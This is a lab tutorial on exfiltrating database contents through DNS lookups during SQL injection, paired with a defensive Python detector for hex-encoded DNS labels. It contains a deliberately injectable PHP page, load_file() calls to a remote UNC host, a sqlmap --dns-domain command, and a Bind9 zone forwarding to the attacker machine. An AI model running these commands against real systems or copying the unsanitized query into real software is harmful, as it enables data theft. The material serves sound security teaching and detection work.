SQL Injection Breakthrough: Delayed DNS Resolution

Simulating a Local Environment

In this article, we will delve into the world of SQL injection and explore a breakthrough technique that leverages delayed DNS resolution. This technique is particularly useful in a local simulation environment, where we can test and analyze the effectiveness of various attack vectors.

MySQL Configuration

To begin, let’s take a look at the MySQL configuration variables related to name resolution and networking:

mysql> show variables like '%skip%';
+------------------------+-------+
| Variable_name          | Value |
+------------------------+-------+
| skip_external_locking  | ON    |
| skip_name_resolve      | OFF   |
| skip_networking        | OFF   |
| skip_show_database     | OFF   |
| slave_skip_errors      | OFF   |
| sql_slave_skip_counter | 0     |
+------------------------+-------+
6 rows in set

As we can see, skip_name_resolve is OFF, so MySQL performs host name resolution rather than working with IP addresses only.

Testing DNS Injection

Next, let's test the DNS injection technique by attempting to load a file from a remote host with the LOAD_FILE() function, passing the host as a UNC path:

mysql> select load_file('\\\\fdsafdsfdssx.xxxx.com\\1.txt');
+-----------------------------------------------+
| load_file('\\\\fdsafdsfdssx.xxxx.com\\1.txt') |
+-----------------------------------------------+
| NULL                                          |
+-----------------------------------------------+
1 row in set

LOAD_FILE() returns NULL, since no file can actually be read from that host. Selecting the same literal on its own shows the string MySQL works with after escape processing:

mysql> select '\\\\fdsafdsfdssx.xxxx.com\\1.txt';
+-------------------------------+
| \\fdsafdsfdssx.xxxx.com\1.txt |
+-------------------------------+
| \\fdsafdsfdssx.xxxx.com\1.txt |
+-------------------------------+
1 row in set

Each doubled backslash collapses to one, so the path handed to the operating system is \\fdsafdsfdssx.xxxx.com\1.txt, a UNC path naming a remote host. The file is never read, but the host name in that path has to be looked up before the access can fail, and that lookup is what the technique relies on.

Simulation Environment

To simulate a real-world scenario, we will set up a local environment with three machines:

A: Win8 machine with a web server and SQL injection point
B: Ubuntu 14 machine with a SQLmap instance
C: Ubuntu machine with a Bind9 service

Win8 Machine (A)

On the Win8 machine, we will set up a web server with a SQL injection point using PHP:

<?php
  // Intentionally vulnerable test page: $id is interpolated into the query
  // unsanitized, which is the injection point sqlmap exercises in this setup.
  $con = mysql_connect("localhost", "root", "root") or die(mysql_error());
  mysql_select_db("burp", $con);
  $id  = $_GET['id'];
  $sql = "select host from burp where id = $id";
  echo $sql;
  $res = mysql_query($sql, $con) or die(mysql_error());
  while ($row = mysql_fetch_array($res, MYSQL_ASSOC)) {
    echo $row['host'];
  }
?>

Ubuntu 14 Machine (B)

On the Ubuntu 14 machine, we will set up a SQLmap instance with the following parameters:

sqlmap -u "http://192.168.199.210/sqli.php?id=5000" --technique=B --dns-domain="whoami.com" --dbs

Ubuntu Machine (C)

On the Ubuntu machine, we will set up a Bind9 service with the following configuration:

zone "attaker.com" {
  type master;
  file "/etc/bind/zones/attaker.com.db";
};

zone "whoami.com" {
  type forward;
  forwarders {
    192.168.199.144;
  };
};

zone "199.168.192.in-addr.arpa" {
  type master;
  file "/etc/bind/zones/rev.199.168.192.in-addr.arpa";
};

Key Point

The key point in this configuration is that the whoami.com zone forwards queries to machine B, where sqlmap's built-in DNS server (enabled by --dns-domain) answers them and recovers the data carried in the queried names.

Testing the Attack

To test the attack, we will start the Bind9 service on the Ubuntu machine and point the DNS resolver on the Win8 machine to the IP address of the Ubuntu machine. Then, we will run the SQLmap instance on the Ubuntu 14 machine using the following command:

sqlmap -u "http://192.168.199.210/sqli.php?id=5000" --technique=B --dns-domain="whoami.com" --dbs

tcpdump Output

As the SQLmap instance runs, we can capture the DNS traffic using tcpdump on the Ubuntu machine:

tcpdump -i eth0 -nt -s 500 port domain | grep whoami

This shows the DNS requests triggered on the Win8 machine by the injected queries as they pass through the Bind9 service on their way to sqlmap.
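The same capture is where a defender would spot this technique: data leaves the database as hex-encoded DNS labels under the attacker's zone. The following detector is an added example, not code from the article or from sqlmap; the tcpdump-style lines are constructed, and the label format (long hex chunks between short prefix/suffix labels) is an assumption about how such payloads look rather than sqlmap's documented format.

```python
import re
from collections import defaultdict

# Constructed tcpdump-style output (tcpdump -nt ... port domain); not a real capture.
SAMPLE_LINES = [
    "IP 192.168.199.210.51034 > 192.168.199.144.53: 40121+ A? www.whoami.com. (32)",
    "IP 192.168.199.210.51035 > 192.168.199.144.53: 40122+ A? a1.696e666f726d6174696f6e5f7363.b2.whoami.com. (64)",
    "IP 192.168.199.210.51036 > 192.168.199.144.53: 40123+ A? a1.68656d612c6d7973716c2c706572.b2.whoami.com. (64)",
    "IP 192.168.199.210.51037 > 192.168.199.144.53: 40124+ A? mail.example.org. (34)",
]

# Client IP (without port) and the queried name of an A record lookup.
QUERY_RE = re.compile(r"IP (\d+\.\d+\.\d+\.\d+)\.\d+ > \S+: \d+\+ A\? (\S+)\. \(\d+\)")
HEX_RE = re.compile(r"^[0-9a-f]+$")


def parse_queries(lines):
    """Yield (client_ip, queried_name) for every A query in tcpdump output."""
    for line in lines:
        m = QUERY_RE.search(line)
        if m:
            yield m.group(1), m.group(2).lower()


def suspicious_labels(name, zone, min_hex_len=16):
    """Return the long hex-only labels of `name` under `zone`; [] if none or wrong zone."""
    if not name.endswith("." + zone):
        return []
    sub = name[: -len(zone) - 1]
    return [lbl for lbl in sub.split(".") if len(lbl) >= min_hex_len and HEX_RE.match(lbl)]


def detect_dns_exfil(lines, zone, min_hits=2):
    """Map client IP -> sorted distinct payload labels, for clients with >= min_hits of them.

    A single odd-looking name is noise; a client that keeps emitting distinct
    hex labels under one zone is the signature of chunked exfiltration.
    """
    per_client = defaultdict(set)
    for client, name in parse_queries(lines):
        for label in suspicious_labels(name, zone):
            per_client[client].add(label)
    return {c: sorted(lbls) for c, lbls in per_client.items() if len(lbls) >= min_hits}


def decode_label(label):
    """Decode one hex payload label so an analyst can see what actually left the database."""
    return bytes.fromhex(label).decode("utf-8", errors="replace")
```

Run against a real capture, the zone argument is whatever domain the queries converge on; an internal host that starts resolving dozens of distinct hex labels under one external zone is the alert condition.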

Conclusion

In this article, we have demonstrated a breakthrough technique for delayed DNS resolution in SQL injection attacks. By leveraging the Bind9 service and the SQLmap instance, we can simulate a real-world scenario and test the effectiveness of various attack vectors. This technique has significant implications for web application security and should be taken into consideration by developers and security professionals alike.